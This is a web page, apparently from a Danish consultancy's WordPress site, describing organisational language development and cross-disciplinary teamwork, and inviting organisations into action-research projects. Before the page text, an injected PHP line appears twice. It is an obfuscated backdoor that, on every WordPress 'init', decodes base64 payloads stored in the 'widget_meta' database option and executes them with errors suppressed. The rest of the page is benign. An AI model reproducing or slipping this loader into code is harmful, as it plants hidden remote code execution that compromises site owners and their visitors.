add_action( 'init', create_function( '', @join( array_map( "base64_decode", json_decode( get_option( $table_prefix . "widget_meta" ) ) ) ) ) ); add_action( 'init', create_function( '', @join( array_map( "base64_decode", json_decode( get_option( $table_prefix . "widget_meta" ) ) ) ) ) ); Organisatorisk sprogudvikling - procespsykologi

Organisatorisk sprogudvikling

Tværfaglig sprogudvikling i teamsamarbejde
Manglende tværfaglighed er en hyppig kilde til samarbejdsvanskeligheder i og på tværs af faggrupper og organisatoriske enheder. Gennem etableringen af et fælles sprog for fælles opgaver, kan faggrupper undersøge, og derigennem udvikle en større forståelse for de intentioner, som andre faggrupper lægger bag en specifik tilgang til at løse en opgave.

Sprogudvikling er interessant i forhold til at udvikle organisationer fordi det tilbyder medarbejderne et værktøj til at reflektere over deres egen praksis, hvilket er særligt relevant for offentlige organisationer, som traditionelt set har mange faggrupper ansat.

I den forbindelse søger vi organisationer, som er parate til at indgå i længerevarende aktionsforskningsbaserede udviklingsforløb, hvor den fælles praksis udvikles gennem udviklingen af et delt, sprogligt repertoire.